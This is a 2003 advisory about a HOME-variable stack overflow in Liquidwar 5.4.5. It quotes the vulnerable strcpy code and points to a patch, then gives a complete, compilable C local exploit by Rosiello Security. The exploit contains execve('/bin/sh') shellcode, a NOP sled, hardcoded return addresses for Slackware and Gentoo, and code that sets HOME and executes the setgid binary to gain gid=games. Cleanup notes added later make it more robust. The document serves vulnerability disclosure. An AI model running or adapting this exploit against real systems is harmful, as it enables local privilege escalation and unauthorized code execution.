Rosiello Security All rights reserved. http://www.rosiello.org AUTHOR: Angelo Rosiello -------------------------------------------------------------- POST BY ZONE-H Vulnerable systems: * Liquidwar version 5.4.5 The vulnerable code is: #define STARTUP_MAX_PATH_LENGTH 1000 [...] char STARTUP_CFG_PATH[STARTUP_MAX_PATH_LENGTH]; [...] static void set_path (void) { char home_path[512]; char *home_env; if (exist_argument_value (IDENT_CFG)) strcpy(STARTUP_CFG_PATH,get_argument_str (IDENT_CFG)); else { #ifdef ALLEGRO_UNIX home_env=getenv("HOME"); strcpy(home_path,home_env); /* unchecked strcpy() */ strcat(home_path,"/"); #else home_env=""; strcpy(home_path,home_env); /* unchecked strcpy() but not dangerous */ #endif strcpy(STARTUP_CFG_PATH,home_path); /* unchecked strcpy() */ strcat(STARTUP_CFG_PATH,DEFAULT_CFG_PATH); } The HOME environment variable is entirely under the local user's control, and on Unix builds it is copied into the 512-byte stack buffer home_path by an unchecked strcpy(); a value longer than the buffer therefore overflows it (a classic stack-based overflow), and the subsequent unchecked copy into the 1000-byte STARTUP_CFG_PATH is bounded no better. Note also that getenv("HOME") may return NULL, which strcpy() does not tolerate, so an unset HOME crashes the program outright. Because liquidwar is presumably installed setgid games, a local attacker can exploit this to execute arbitrary code with gid=games privileges. Solution: A patch is available here: http://www.zone-h.org/download/file=4943. Information provided by Astharot ----------------------------------------------------------------- /* * * http://www.rosiello.org * (c) Rosiello Security * * Copyright Rosiello Security 2003 * All Rights reserved. 
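/*
 * Liquidwar 5.4.5 local exploit: stack overflow through the HOME
 * environment variable (see the Zone-H advisory above).
 *
 * Tested on Slackware 9.0.0 & Gentoo 1.4
 *
 * Author: Angelo Rosiello
 * Mail  : angelo@rosiello.org
 * URL   : http://www.rosiello.org
 *
 * Greetz: Astharot by Zone-H who posted the stack overflow bug
 *
 * Review notes:
 *  - The payload is Linux/i386 only: the return address is a 32-bit
 *    little-endian value and the shellcode uses the int 0x80 ABI.  It is
 *    now stored with memcpy() as a uint32_t instead of through a `long *`,
 *    so the layout no longer depends on sizeof(long) of the host.
 *  - setenv() expects a C string; the original buffer had no terminating
 *    NUL, so the library read past its end.  The buffer is LEN+1 bytes and
 *    the last byte is '\0'.
 *  - strlen()/memcpy() need <string.h>; the original relied on implicit
 *    declarations.  execl()'s terminating NULL is cast to (char *) as a
 *    variadic argument requires.
 */
#define _POSIX_C_SOURCE 200809L /* declare setenv()/execl() under -std=c11 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <unistd.h>

/* execve("/bin/sh", ...) for Linux/i386; contains no NUL byte */
static const char shellcode[] =
    "\xeb\x17\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d"
    "\x4e\x08\x31\xd2\xcd\x80\xe8\xe4\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x58";

#define NOP 0x90
#define LEN 520               /* payload length for Slackware 9.0.0 */
//#define LEN 528             /* payload length for Gentoo 1.4 */
#define RET 0xbffff414UL      /* valid address for Slackware 9.0.0 */
//#define RET 0xbffff360UL    /* valid address for Gentoo 1.4 */

/* Number of trailing bytes left holding the return address. */
#define RET_TAIL 50

/* Target binary; the advisory's gid=games claim implies it is installed
 * setgid games — confirm with `ls -l` before running. */
#define TARGET "/usr/games/liquidwar"

/*
 * Build the exploit string into buf, which must hold at least len+1 bytes:
 *
 *   [NOP sled][shellcode][return address repeated][NUL]
 *
 * The whole region is first filled with the return address so that the
 * 4-byte pattern stays aligned at offset 0, then the sled and shellcode
 * overwrite its head, leaving RET_TAIL bytes of addresses at the tail.
 *
 * Returns the number of payload bytes written (excluding the NUL), or 0 if
 * len is too small to hold shellcode + RET_TAIL.
 */
static size_t build_payload(char *buf, size_t len, uint32_t retaddr)
{
    size_t sc_len = strlen(shellcode);
    size_t sled;
    size_t i;

    if (len < sc_len + RET_TAIL) {
        return 0;
    }

    for (i = 0; i + sizeof retaddr <= len; i += sizeof retaddr) {
        memcpy(buf + i, &retaddr, sizeof retaddr);
    }

    sled = len - sc_len - RET_TAIL;
    memset(buf, NOP, sled);
    memcpy(buf + sled, shellcode, sc_len);

    buf[len] = '\0'; /* setenv() needs a terminated string */
    return len;
}

int main(void)
{
    char buffer[LEN + 1];
    uint32_t retaddr = RET;

    fprintf(stderr, "\n(c) Rosiello Security 2003 - http://www.rosiello.org\n");
    fprintf(stderr, "Liquidwar's exploit for Slackware 9.0.0\n");
    fprintf(stderr, "by Angelo Rosiello - angelo@rosiello.org\n\n");
    fprintf(stderr, "using address 0x%lx\n", (unsigned long)retaddr);

    if (build_payload(buffer, LEN, retaddr) == 0) {
        fprintf(stderr, "LEN is too small for the shellcode\n");
        return 1;
    }

    /* export the variable, run liquidwar */
    if (setenv("HOME", buffer, 1) != 0) {
        perror("setenv");
        return 1;
    }
    execl(TARGET, "liquidwar", (char *)NULL);

    /* only reached if the exec itself failed */
    perror("execl " TARGET);
    return 1;
}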